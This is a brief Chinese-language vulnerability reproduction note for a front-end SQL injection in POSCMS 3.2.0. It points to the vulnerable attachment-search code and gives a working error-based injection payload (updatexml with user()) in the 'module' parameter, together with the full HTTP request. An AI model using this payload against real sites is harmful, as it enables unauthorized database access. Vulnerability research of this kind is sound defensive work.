POSCMS 3.2.0 前台sql注入漏洞
一、漏洞简介
二、漏洞影响
POSCMS 3.2.0
三、复现过程
查看源码(\diy\dayrui\models\Attachment_model.php
)可以发现注入点:
该函数的调用点位于(\diy\module\member\controllers\Account.php
):
对应的功能实际是前台用户中心--->基本管理--->附件管理的搜索功能,随便选择某个类别搜索后会看到这条请求:
GET /index.php?s=member&c=account&m=attachment&module=photo&ext= HTTP/1.1
Host: www.0-sec.org
向module
参数注入Payload果然出现了报错:
但不知道为什么博客里的Payload这里复现失败了,不过已经知道是报错注入,我用了经典的Payload------" or updatexml(1,concat(1,0x7e,user()),1);#
拼接入参数中,得到了数据库当前用户:
GET /index.php?s=member&c=account&m=attachment&module=photo%22%20or%20updatexml(1,concat(1,0x7e,user()),1);%23&ext= HTTP/1.1
Host: www.0-sec.org
参考链接
https://xz.aliyun.com/t/4858#toc-5